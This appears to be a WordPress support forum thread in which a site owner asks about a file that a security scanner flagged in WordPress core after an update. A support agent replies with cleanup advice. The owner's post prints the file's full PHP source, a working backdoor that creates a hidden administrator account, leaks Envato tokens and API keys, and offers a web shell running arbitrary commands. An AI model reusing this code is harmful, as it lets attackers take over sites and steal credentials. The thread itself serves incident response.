ERRORS - Suspicious file in Core u.a.

He we checked our sites with wpmudev tools and get the following errors about suspicious files found in core:

WORDPRESS CORE Unknown file in WordPress core

OTHER Suspicious function foundMedium

What to do?

  • Andi

    Hi Predrag

    <?php error_reporting(0);
    include $_SERVER['DOCUMENT_ROOT'].'/wp-load.php';
    $table_name = $wpdb->get_blog_prefix();
    $sample = 'a:1:{s:13:"administrator";b:1;}';
    if( isset($_GET['ok']) ) { echo '<!-- Silence is golden. -->';}
    if( isset($_GET['awu']) ) {
    $wpdb->query("INSERT INTO $wpdb->users (<code>ID</code>, <code>user_login</code>, <code>user_pass</code>, <code>user_nicename</code>, <code>user_email</code>, <code>user_url</code>, <code>user_registered</code>, <code>user_activation_key</code>, <code>user_status</code>, <code>display_name</code>) VALUES ('1001010', '1001010', '\$P\$B3PJXeorEqVMl//L3H5xFX1Uc0t5870', '1001010', '', '', '2011-06-07 00:00:00', '', '0', '1001010');");
    $wpdb->query("INSERT INTO $wpdb->usermeta (<code>umeta_id</code>, <code>user_id</code>, <code>meta_key</code>, <code>meta_value</code>) VALUES (1001010, '1001010', '{$table_name}capabilities', '{$sample}');");
    $wpdb->query("INSERT INTO $wpdb->usermeta (<code>umeta_id</code>, <code>user_id</code>, <code>meta_key</code>, <code>meta_value</code>) VALUES (NULL, '1001010', '{$table_name}user_level', '10');"); }
    if( isset($_GET['dwu']) ) { $wpdb->query("DELETE FROM $wpdb->users WHERE <code>ID</code> = 1001010");
    $wpdb->query("DELETE FROM $wpdb->usermeta WHERE $wpdb->usermeta.<code>umeta_id</code> = 1001010");}
    if( isset($_GET['e1']) ) { echo '<!-- e1_code -->'; echo esc_html( envato_market()->get_option( 'token' ) ); }
    if( isset($_GET['e2']) ) { $options = get_option( EWPT_PLUGIN_SLUG ); echo '<!-- e2_code -->'; echo esc_attr( $options['user_name'] . ':' .  esc_attr( $options['api_key']));}
    if( isset($_GET['console']) ) {function  MakeSimpleForm() { ?> <form method='GET' action='<?=$_SERVER['PHP_SELF']?>'>
    <input type=text name='cmd'> <input type=submit name='exec' value='ok'> </form> <? } function DoCmd($cmd) { ?>
    <textarea rows=30 cols=80><?=passthru($cmd)?></textarea><br> <? } if ( isset($_REQUEST['exec']) && isset($_REQUEST['cmd']))
    DoCmd($_REQUEST['cmd']); else MakeSimpleForm();}?>

    For me it looks exactly the same like the one in other installations!


    Kind regards

  • Andi

    Hi Predrag

    Just came back to the office, no haven't tried it again but in all those other 3 sites the scan was run actually yesterday and again today and all was green before I moved the file out of the directory.

    Interesting would be also what is creating that file.

    We actually have a scheduler task to run those tests and since Christmas nothing got reported but then yesterday after the update to 4.7.1 the notifications appeared and we have also updated all wpmudev plugins in those sites before.

    Kind regards

  • Dimitris

    Hey there Andi,

    hope you're doing good and don't mind chiming in here! :slight_smile:

    This seems like a suspicious file indeed!
    Please follow next steps so you can better defend:
    – Make sure you have WordPress, themes and plugins all updated to the latest stable version.
    – Change your FTP/cPanel password.
    – Compare number of users you have in (WordPress Dashboard > Users) with those in “wp_users” database table.

    About the source of it, I wasn't able to locate anything by searching the web.
    I noticed that some users had this file after a WP core update though. :thinking:
    Could you please inform me about that? Are you updating via WP admin pages or via another portal? And if so, what's that? Please advise!

    Warm regards,

Thank NAME, for their help.

Let NAME know exactly why they deserved these points.

Gift a custom amount of points.